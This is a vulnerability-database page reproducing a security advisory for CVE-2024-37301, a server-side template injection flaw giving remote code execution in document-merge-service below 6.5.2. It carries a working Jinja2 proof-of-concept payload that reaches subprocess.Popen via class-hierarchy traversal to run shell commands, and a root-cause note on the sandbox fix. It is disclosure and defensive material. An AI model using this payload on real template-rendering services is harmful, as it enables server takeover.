9.1

CVSS Score

Basic Information

CVE ID

CVE-2024-37301

GHSA ID

GHSA-v5gf-r78h-55q6

EPSS Score

CWE

CWE-1336

Published

6/11/2024

Updated

10/16/2024

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-37301

CVE-2024-37301:
document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

Impact

A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.

Patches

It has been patched in v6.5.2

References

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.

(GitHub Advisory)

9.1

CVSS Score

Basic Information

CVE ID

CVE-2024-37301

GHSA ID

GHSA-v5gf-r78h-55q6

EPSS Score

CWE

CWE-1336

Published

6/11/2024

Updated

10/16/2024

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
document-merge-service	pip	< 6.5.2	6.5.2

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stemmed from using jinja2.Environment instead of SandboxedEnvironment. The commit diff shows the patching involved switching to SandboxedEnvironment, which restricts access to unsafe operations. The original Environment implementation allowed template authors to traverse object hierarchies (via class, mro, subclasses) to reach dangerous functions, as demonstrated in the POC using subprocess.Popen for RCE.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Imp**t * r*mot* *o** *x**ution (R**) vi* s*rv*r-si** t*mpl*t* inj**tion (SSTI) *llows *or us*r suppli** *o** to ** *x**ut** in t** s*rv*r's *ont*xt w**r* it is *x**ut** *s t** *o*um*nt-m*r**-s*rv*r us*r wit* t** UI* *** t*us *ivin* *n *tt**k*r *

Reasoning

T** vuln*r**ility st*mm** *rom usin* jinj**.*nvironm*nt inst*** o* S*n**ox***nvironm*nt. T** *ommit *i** s*ows t** p*t**in* involv** swit**in* to S*n**ox***nvironm*nt, w*i** r*stri*ts ****ss to uns*** op*r*tions. T** ori*in*l *nvironm*nt impl*m*nt*ti

9.1

Basic Information

Concerned about an active attack path?

CVE-2024-37301: document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

Impact

Patches

References

POC

9.1

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2024-37301:
document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

Vulnerability Intelligence
Miggo AI